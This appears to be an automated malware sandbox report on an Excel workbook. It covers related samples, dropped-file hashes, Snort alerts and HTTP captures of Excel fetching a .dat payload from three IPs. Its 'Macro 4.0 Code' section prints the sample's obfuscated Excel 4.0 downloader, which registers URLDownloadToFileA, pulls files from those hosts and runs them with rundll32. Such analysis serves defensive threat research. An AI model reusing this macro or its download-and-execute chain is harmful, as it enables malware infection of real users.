                a4sBXU1Yqx.exeGet hashmaliciousBrowse
                • 185.117.73.222
                TYH8f58Xad.exeGet hashmaliciousBrowse
                • 185.117.73.222
                SVCj8158Aq.exeGet hashmaliciousBrowse
                • 185.117.73.222
                20nKUzfIgk.exeGet hashmaliciousBrowse
                • 185.117.73.222
                wKpvhzIoO0.exeGet hashmaliciousBrowse
                • 185.117.73.222
                25PGo0fSFz.exeGet hashmaliciousBrowse
                • 185.117.73.222
                Nl0L0K7vrA.exeGet hashmaliciousBrowse
                • 185.117.73.222
                TYH8f58Xad.exeGet hashmaliciousBrowse
                • 185.117.73.222
                SVCj8158Aq.exeGet hashmaliciousBrowse
                • 185.117.73.222
                25PGo0fSFz.exeGet hashmaliciousBrowse
                • 185.117.73.222
                Nl0L0K7vrA.exeGet hashmaliciousBrowse
                • 185.117.73.222
                Debt-Details-2065399866-05132021.xlsmGet hashmaliciousBrowse
                • 185.183.98.29
                Debt-Details-2065399866-05132021.xlsmGet hashmaliciousBrowse
                • 185.183.98.29
                Debt-Details-717769301-05132021.xlsmGet hashmaliciousBrowse
                • 185.183.96.233
                Debt-Details-717769301-05132021.xlsmGet hashmaliciousBrowse
                • 185.183.96.233
                GREENFLOID-ASUAde2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 45.90.57.62
                3a0c2e79_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 45.90.57.62
                7db2da09_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                3a0c2e79_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                f4853f40_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                7db2da09_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                e3ab9776_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                f4853f40_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                e3ab9776_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 82.118.21.38
                xxrM0xh3us.exeGet hashmaliciousBrowse
                • 82.118.22.75
                3510495740-05102021.xlsmGet hashmaliciousBrowse
                • 195.123.235.1
                3510495740-05102021.xlsmGet hashmaliciousBrowse
                • 195.123.235.1
                3510495740-05102021.xlsmGet hashmaliciousBrowse
                • 195.123.235.1
                CtpIYy9OZ6K8kY3.exeGet hashmaliciousBrowse
                • 195.123.234.243
                520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                • 195.123.235.1
                520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                • 195.123.235.1
                520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                • 195.123.235.1
                Outstanding-Debt-1241609431-05042021.xlsmGet hashmaliciousBrowse
                • 5.34.179.36
                Outstanding-Debt-1241609431-05042021.xlsmGet hashmaliciousBrowse
                • 5.34.179.36
                ADCDATACOM-AS-APADCDATACOMHKde2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 194.156.98.173
                de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 194.156.98.173
                c33304d6_by_Libranalysis.docmGet hashmaliciousBrowse
                • 194.156.98.157
                c33304d6_by_Libranalysis.docmGet hashmaliciousBrowse
                • 194.156.98.157
                2sOfVsf40V.exeGet hashmaliciousBrowse
                • 194.156.98.159
                373.docx.exeGet hashmaliciousBrowse
                • 194.156.99.64
                373.docx.exeGet hashmaliciousBrowse
                • 194.156.99.64
                373.docx.exeGet hashmaliciousBrowse
                • 194.156.99.64
                38#U0442.exeGet hashmaliciousBrowse
                • 194.156.99.64
                38#U0442.exeGet hashmaliciousBrowse
                • 194.156.99.64
                QwLijaR9ex.exeGet hashmaliciousBrowse
                • 194.156.98.99
                order_list_fe99087.xlsGet hashmaliciousBrowse
                • 194.156.98.99
                516783.PO.xlsGet hashmaliciousBrowse
                • 194.156.98.99
                FileSetup-v58.37.15.exeGet hashmaliciousBrowse
                • 45.84.179.6
                bUs2WfheTq.exeGet hashmaliciousBrowse
                • 194.156.98.46

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD3D6ABC.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=9, software=Adobe Photoshop 22.0 (Windows), datetime=2021:03:02 23:57:02], baseline, precision 8, 1600x1600, frames 3
                Category:dropped
                Size (bytes):185386
                Entropy (8bit):7.326521161282199
                Encrypted:false
                SSDEEP:3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8
                MD5:A6E3680B30CEC6746291E55B7D9B6975
                SHA1:E45C3A057F840EF4C96AB8233E1E21700BBDA199
                SHA-256:89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261
                SHA-512:FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......JFIF.....`.`.....NExif..MM.*.......1...........2..................................Q...........Q...........Q...........i.....................z....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\2FEE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):201556
                Entropy (8bit):7.357000821698613
                Encrypted:false
                SSDEEP:6144:taBwxLex0VAIu4bVYeVHrK5AySfahklOGL7:ttlex0VbLbGeH+59SjEGX
                MD5:EDA15C10E3180C047F6CDB5963A35AA8
                SHA1:76FDEB42F4307B4DA7279C64F413736B407C6FED
                SHA-256:B7A3CAB098B593EBAC220066576493F3AE525362C2C283DD93EE664DF0D3578C
                SHA-512:900AF245DCBBCA5FB7A6234B2485B61DE3D84E33F5A88F8BCDB02831E74402023D32CC8AC18C4DFDE59D56C73DE3BB8745ACEA4C50ABE9FA37A7D07F0BD58500
                Malicious:false
                Reputation:low
                Preview: ...n.0.............0...[.v..H..F..Im......$......e..$M..^...=..........V*S......+.B.#A[.%[c`....wk.!#k.JV..q.D....:4.....H......*.......hb....M.p..:f.+z..d....7.%T..9..Dr.?.....b..J+.......2......c....{..u...FU.e.X....(....s8..v...SM...*.~...Jbv.>.....W.?Y..[.,..).M.q%P.m........i..y....}.5..R.....n..../....>.....o.KE....U....N.D..v.;&.K5RKD.^....H[.#q.....|.~.....=F......l.Ww.o.#~H.O...]...BG......Y.r.;.>>M..o]...q...,Y..G..,...;"M....y.i.K.{...........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat May 15 00:20:46 2021, atime=Sat May 15 00:20:46 2021, length=16384, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.502712221051524
                Encrypted:false
                SSDEEP:12:85QaCLgXg/XAlCPCHaXtB8XzB/xs9ZX+WnicvbSR9bDtZ3YilMMEpxRljKt2TdJU:85U/XTd6jcZYe6Dv3qlrNru/
                MD5:31D9A95EA06A55CCB6840E8E1F5C6EB7
                SHA1:8CAD094E619443D49BBF2C5EF5E0D02DE9A93EDF
                SHA-256:C53CD5D78F3A4A18351F722B683BECA2630CE31576186821BD443D53C1537DFD
                SHA-512:FC73738150AB5C192151E3E33AF03AA52F56D0071D00B136AC97372D65ABECC792EFC46216D6A601086CE91BA55D98A414501CC48CAC81DC1AF31621BC9C321E
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G...ji.(I...ji.(I...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a5c5a139_by_Libranalysis.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 15 00:20:28 2021, mtime=Sat May 15 00:20:46 2021, atime=Sat May 15 00:20:46 2021, length=200665, window=hide
                Category:dropped
                Size (bytes):2178
                Entropy (8bit):4.606023709505623
                Encrypted:false
                SSDEEP:48:83/XT0jhfOOENr/hNCOOEylQh23/XT0jhfOOENr/hNCOOEylQ/:83/XojhfOFHNCOFylQh23/XojhfOFHNv
                MD5:DC7596373682AD43A7733D42FE2A0A74
                SHA1:2121DA076AEADE04038FFC86671D24132C5DB4D6
                SHA-256:DED727AA295B5484BC7B124BD554095FA6F5DDEE592B978DF2D16D4BCAF2767E
                SHA-512:DCE6FA7BDA244278545E1AD3600E701351702E3A3C93F73FFB5B861073E75F928A67BD8430B58805B748BAB0722D2C1BA1F3BA9278354A84A73B12034930D0D8
                Malicious:false
                Reputation:low
                Preview: L..................F.... ...M..}(I...ji.(I...p.(I...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .A5C5A1~1.XLS..h......R...R..*...9&....................a.5.c.5.a.1.3.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.x.......................-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\a5c5a139_by_Libranalysis.xlsx.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.5.c.5.a.1.3.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):127
                Entropy (8bit):4.670590395516913
                Encrypted:false
                SSDEEP:3:oyBVomxWPS6IUwSLMp6lcQHl6IUwSLMp6lmxWPS6IUwSLMp6lv:dj8hN2NXhNf
                MD5:41D0C0C77A2F9EA83301A886C932D7D2
                SHA1:7E3FF4C55C5C7C3456C395AAD7105BF8E02DF356
                SHA-256:1723978535AF19FDC47AA70EB6D687456981094429EF402E6CD768FB726B7DE2
                SHA-512:508F4340A42840E74085FC4076E9308E97CD2CCA97E700CD191B67EC17E47FAE890DBDAF92917F4D76E53D35C6C11D5060DE9F1093DB45EC2287EBE78D6A3080
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..a5c5a139_by_Libranalysis.LNK=0..a5c5a139_by_Libranalysis.LNK=0..[misc]..a5c5a139_by_Libranalysis.LNK=0..
                C:\Users\user\Desktop\FFEE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):200665
                Entropy (8bit):7.351335282810134
                Encrypted:false
                SSDEEP:3072:uEwLQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57dDOOLR:uxLex0VAIu4bVYeVHrK5AySfahkvOOLR
                MD5:8EB6632AB55682C48CAC51495A89946C
                SHA1:586F7CF6009A5F5EC008FF072720ED364F350A85
                SHA-256:94154E914FC7661E71010367A385662CF250D034091E0EF2BA10CB1EADCA9A43
                SHA-512:5976F09FD656A9A7C6E62A0883124FF35CDB43D0DF8975234EA30D033C6655672130917C84A466B4246DC6B72D5618F9CCE6294D3945E783D71C443A68ADDD29
                Malicious:false
                Reputation:low
                Preview: ..n.0............a..n....{.Ubl5.$.l...('.. ...0..(..G.29.^..x..6.J..cQ...X_W.....(..7....X.....O..e.,8.c%...CJ........YH.".M..J.U..|<..:x.O#..b:..3......+.'.Eq.Z..*.btV+bP....(.fV....e..c.e....1YvL.@...;=.8.g.............!......Xo..6W.9B..~..L.@q.....%.N..4..a^...[..e...O.....ew:;1H....q>....p\....@8.....?q...Av.o.N...EZ:..g..=....A.'..W...I.-#......:..7...O\...!....)D. A....G.. ..M...6.<M.7.1 .+...o.G........PK..........!...Gx...._.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$a5c5a139_by_Libranalysis.xls
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):165
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                MD5:797869BB881CFBCDAC2064F92B26E46F
                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                Malicious:false
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\user\Desktop\~$a5c5a139_by_Libranalysis.xlsx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.361461703898337
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:a5c5a139_by_Libranalysis.xlsx
                File size:202458
                MD5:a5c5a139b458c718527f59afe34a759a
                SHA1:a2743d88245ac25263afffd7f4dcbd0fe53e0bdf
                SHA256:16383e719fa9ff39d7d4dac2631fa8bfe0a6f63d5130c33053bc0db5e5aa1f89
                SHA512:274978ae4caafc3474896b5b4478f59eacfd056f3a258bbd3c6fec7933586d93ba90dbbab5a90e10c0fcd47b4073ca287ada65ed1daabbb98abd5fa559306e2d
                SSDEEP:3072:ctbmLQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57dB:4mLex0VAIu4bVYeVHrK5AySfahk1
                File Content Preview:PK..........!..H.g............[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4b4bcb4

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "a5c5a139_by_Libranalysis.xlsx"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                "=FORMULA(Sheet000!J17&Sheet000!J22&Sheet000!J19,G19)=PI()=PI()=PI()"=HALT()
                ,,,"=FORMULA(Sheet000!P16,F27)=PI()=PI()=PI()",,,,,,,,,,,,"=NOW()&"".dat""",,,,,=,,,,REGIS,,,,"TER(""uRlM",,,,"=""htt""""on"",""URLDown",,"=""45.90.57.62/""","=JKKHYUGFD(0,G27&G28&E28&F23,""..\lertio.cersw"",0,0)",p://"loadToFileA"",""J",,"=""185.198.57.83/""","=JKKHYUGFD(0,G27&G28&E29&F23,""..\lertio.cersw1"",0,0)","JCCBB"",""JKKH",,"=""194.156.98.173/""","=JKKHYUGFD(0,G27&G28&E30&F23,""..\lertio.cersw2"",0,0)","YUGFD"",,1,9)",,,,,,,,,,,,,,,,,,,=GOTO(Sheet2!H13),
                "=ON.TIME(NOW()+""00:00:02"",""Hot"")"=HALT()
                "=FORMULA(Sheet000!J17&Sheet000!J21&Sheet000!J19,G19)=PI()=PI()=PI()"=GOTO(Sheet4!G5)
                "=FORMULA(Sheet000!J17&Sheet000!J18&Sheet000!J19,H25)=PI()=PI()=PI()",,=,,,,"EXEC(""ru",,,,"ndll32 ""&""",,,,..\lertio.cersw,..\lertio.cersw1,..\lertio.cersw2,,"""&"",Dll",,,,Regist,,,,"erServer"")",,,,,,,,,,,,,,,,,,,,,,=GOTO(Sheet3!G2),,,,

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                05/14/21-18:20:46.726203TCP1201ATTACK-RESPONSES 403 Forbidden804916545.90.57.62192.168.2.22
                05/14/21-18:20:47.007214TCP1201ATTACK-RESPONSES 403 Forbidden8049166185.198.57.83192.168.2.22
                05/14/21-18:20:52.224764TCP1201ATTACK-RESPONSES 403 Forbidden8049167194.156.98.173192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                May 14, 2021 18:20:46.480609894 CEST4916580192.168.2.2245.90.57.62
                May 14, 2021 18:20:46.521224022 CEST804916545.90.57.62192.168.2.22
                May 14, 2021 18:20:46.521389008 CEST4916580192.168.2.2245.90.57.62
                May 14, 2021 18:20:46.522207022 CEST4916580192.168.2.2245.90.57.62
                May 14, 2021 18:20:46.561770916 CEST804916545.90.57.62192.168.2.22
                May 14, 2021 18:20:46.726202965 CEST804916545.90.57.62192.168.2.22
                May 14, 2021 18:20:46.726270914 CEST4916580192.168.2.2245.90.57.62
                May 14, 2021 18:20:46.752799034 CEST4916680192.168.2.22185.198.57.83
                May 14, 2021 18:20:46.808867931 CEST8049166185.198.57.83192.168.2.22
                May 14, 2021 18:20:46.809041023 CEST4916680192.168.2.22185.198.57.83
                May 14, 2021 18:20:46.809680939 CEST4916680192.168.2.22185.198.57.83
                May 14, 2021 18:20:46.865840912 CEST8049166185.198.57.83192.168.2.22
                May 14, 2021 18:20:47.007214069 CEST8049166185.198.57.83192.168.2.22
                May 14, 2021 18:20:47.007383108 CEST4916680192.168.2.22185.198.57.83
                May 14, 2021 18:20:47.018506050 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:20:50.027827024 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:20:50.279433012 CEST8049167194.156.98.173192.168.2.22
                May 14, 2021 18:20:50.279583931 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:20:50.280206919 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:20:50.531142950 CEST8049167194.156.98.173192.168.2.22
                May 14, 2021 18:20:52.224764109 CEST8049167194.156.98.173192.168.2.22
                May 14, 2021 18:20:52.224916935 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:21:51.728797913 CEST804916545.90.57.62192.168.2.22
                May 14, 2021 18:21:51.728991985 CEST4916580192.168.2.2245.90.57.62
                May 14, 2021 18:21:52.008661985 CEST8049166185.198.57.83192.168.2.22
                May 14, 2021 18:21:52.008863926 CEST4916680192.168.2.22185.198.57.83
                May 14, 2021 18:21:57.228473902 CEST8049167194.156.98.173192.168.2.22
                May 14, 2021 18:21:57.228738070 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:22:46.409228086 CEST4916780192.168.2.22194.156.98.173
                May 14, 2021 18:22:46.409770966 CEST4916680192.168.2.22185.198.57.83
                May 14, 2021 18:22:46.411212921 CEST4916580192.168.2.2245.90.57.62
                May 14, 2021 18:22:46.450882912 CEST804916545.90.57.62192.168.2.22
                May 14, 2021 18:22:46.463902950 CEST8049166185.198.57.83192.168.2.22
                May 14, 2021 18:22:46.659295082 CEST8049167194.156.98.173192.168.2.22

                HTTP Request Dependency Graph

                • 45.90.57.62
                • 185.198.57.83
                • 194.156.98.173

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.224916545.90.57.6280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                May 14, 2021 18:20:46.522207022 CEST0OUTGET /44330.7644571759.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 45.90.57.62
                Connection: Keep-Alive
                May 14, 2021 18:20:46.726202965 CEST1INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 14 May 2021 16:20:46 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249166185.198.57.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                May 14, 2021 18:20:46.809680939 CEST1OUTGET /44330.7644571759.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.198.57.83
                Connection: Keep-Alive
                May 14, 2021 18:20:47.007214069 CEST2INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 14 May 2021 16:20:46 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.2249167194.156.98.17380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
